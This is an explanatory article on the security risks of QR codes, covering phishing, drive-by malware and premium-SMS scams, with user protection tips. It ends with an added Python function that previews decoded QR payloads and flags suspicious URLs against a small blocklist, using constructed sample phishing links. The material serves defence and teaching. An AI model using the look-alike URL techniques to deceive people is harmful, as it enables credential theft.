A QR code is a square matrix with an arrangement of small black square dots. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But they can be malicious, and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts.
Security Risks Involved with Use of QR Codes

As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes.

Phishing

Phishing is a popular way of hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user uses this fake page to log in, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put a QR code along with a URL so users can quickly scan the QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print similar kinds of fake posters and put them in public places. Innocent customers will scan these fake QR codes to visit the websites, but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. In mobile devices, it is hard to check the full address in the browsers. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to log in, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victim of QRishing at public places.
Malicious software distribution

Scammers generally use malicious websites to distribute malware via drive-by download attacks. Nowadays, most of the drive-by download attacks are being done against Android users. Drive-by download attacks are attacks in which a website forcefully downloads software to your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to these kinds of malicious websites, we can easily trick users. Users cannot see the URL, so there is no point of doubt. In QR codes, there is no need to enter the URL manually; users only scan the QR code. And they only know what you write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices.

Pointing to potentially harmful websites

This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do a lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDOS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked.

How to Protect Yourself from Malicious QR Codes

Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use them from banners at public places, you need to be selective. There are a few things which you can do to protect yourself from malicious QR codes and their attacks.
Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the time, scammers stick their fake QR code above the legitimate QR code in a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code.

Be suspicious and never give personal or login info: Always be suspicious of the page you land on via a QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually in the browser’s address bar. Entering login information on the pages you land on via a QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and log in directly on the website.

Look at the URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask you to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you to. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend the use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs within its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you.
Conclusion

Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen a sudden rise in the use of QR codes. Now various websites and apps let users use a QR code to log in or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, it will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn if a website is a phishing website or is trying to install a dangerous app in your smartphone. I hope you have found this article interesting. If you use QR codes, do not forget to be safe.

References
http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic
https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf
http://en.wikipedia.org/wiki/QR_code
Source
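The article's "look at the URL before proceeding" advice is something a scanner app can enforce in code: decode the QR payload, work out what action it would trigger, show the full target and flag the properties that make mobile-browser phishing and drive-by pages hard to spot. The function below is an added example written for this page, not code from the article or from any scanner app such as Norton Snap; the payloads, the host names and the small KNOWN_BAD_HOSTS blocklist are constructed stand-ins, and the QR image decoding step itself is assumed to have already happened.

```python
"""Added example: preview and sanity-check a decoded QR payload before acting
on it. Hosts and payloads are constructed; the blocklist is a hypothetical
stand-in for a scanner app's malicious-link database."""
import ipaddress
from urllib.parse import urlsplit

# Constructed blocklist (hypothetical hosts, not real indicators).
KNOWN_BAD_HOSTS = {"login-example-bank.example", "free-prize.example"}


def classify(payload):
    """Map a decoded payload to the action a scanner would take on it."""
    low = payload.strip().lower()
    if low.startswith(("http://", "https://")):
        return "url"
    if low.startswith(("sms:", "smsto:")):
        return "sms"
    if low.startswith("tel:"):
        return "tel"
    if low.startswith("mailto:"):
        return "mailto"
    if low.startswith("begin:vcard"):
        return "vcard"
    return "text"


def inspect_payload(payload):
    """Return (kind, full_target, warnings).

    An empty warnings list means nothing was flagged; the caller should still
    display full_target to the user, which is the article's core advice."""
    kind = classify(payload)
    target = payload.strip()
    warnings = []
    if kind == "url":
        u = urlsplit(target)
        host = (u.hostname or "").lower()
        if u.scheme == "http":
            warnings.append("plain http: the page and anything typed into it travel unencrypted")
        if "@" in u.netloc:
            # 'trusted.example@evil.example' renders as trusted.example in a
            # narrow address bar, but the browser connects to the host after '@'.
            warnings.append(f"userinfo before '@': the real host is {host!r}")
        try:
            ipaddress.ip_address(host)
            warnings.append("host is a bare IP address, unusual for a legitimate site")
        except ValueError:
            pass
        if host.startswith("xn--") or ".xn--" in host:
            warnings.append("punycode host: check for look-alike characters")
        if host in KNOWN_BAD_HOSTS:
            warnings.append("host is on the blocklist")
        return kind, u.geturl(), warnings
    if kind in ("sms", "tel"):
        # Matches the premium-number SMS case described in the article.
        warnings.append("would send a message or place a call; confirm number and cost first")
    return kind, target, warnings


if __name__ == "__main__":
    for sample in ("https://www.example.com/training",
                   "http://accounts.example.org@login-example-bank.example/signin",
                   "http://203.0.113.5/app.apk",
                   "SMSTO:12345:hello",
                   "BEGIN:VCARD\nVERSION:3.0\nN:Doe;Jane\nEND:VCARD"):
        kind, target, warns = inspect_payload(sample)
        print(kind, target.splitlines()[0], warns or "ok")
```

The hard-coded blocklist is where a real scanner consults its reputation database; the point of the example is the ordering: classify, display the full target, and only then let the user decide, rather than opening the link the moment the camera recognises the code.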